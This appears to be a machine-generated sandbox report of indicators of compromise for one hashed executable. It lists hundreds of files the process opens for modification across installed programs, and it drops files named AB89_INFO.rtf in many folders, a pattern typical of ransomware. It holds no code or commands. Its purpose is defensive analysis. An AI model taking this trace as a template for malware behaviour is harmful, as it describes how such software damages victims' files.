description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+11 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javaws.policy 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\WatchPop.eps 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pl.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Melbourne 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Omsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Belgrade 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Ojinaga 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Bougainville 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Journal.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Amman 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fr.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Mendoza 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Managua 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+6 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Seyes.jtp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Easter 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\rmid.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tallinn 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ant-javafx.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunec.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Midway 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rio_Branco 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_sv.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7MDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\New_Salem 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Denver 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\SubmitBlock.pub 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Music.jtp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\en-GB.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\master_preferences 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jakarta 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\PushBlock.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Amsterdam 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\London 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Monaco 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-execution.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Syowa 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Memo.jtp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\th.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\meta-index 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tashkent 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuching 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\tzmappings 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Macau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Perth 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Helsinki 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\update-settings.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Indianapolis 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ho_Chi_Minh 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Casey 